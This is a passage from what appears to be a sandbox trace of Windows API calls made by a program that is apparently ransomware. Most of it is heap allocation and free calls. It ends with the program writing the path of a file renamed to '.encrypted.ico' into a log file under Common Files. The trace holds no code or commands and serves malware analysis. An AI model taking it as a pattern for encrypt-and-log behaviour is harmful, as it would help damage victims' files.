(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.689] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0036.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.690] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ico", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.691] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.691] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.693] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0036.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0036.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.694] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x140) returned 0x7c5448 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.695] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.695] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.695] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.696] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.696] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.696] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.696] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1f47, lpOverlapped=0x0) returned 1 [0036.696] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.696] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1f47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.696] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.encrypted.ico\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0036.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x52) returned 0x794b90 [0036.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.encrypted.ico\r\n", cchWideChar=82, lpMultiByteStr=0x794b90, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.encrypted.ico\r\n", lpUsedDefaultChar=0x0) returned 82 [0036.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0036.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0036.696] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x51, lpOverlapped=0x0) returned 1 [0036.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.697] CloseHandle (hObject=0x128) returned 1 [0036.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 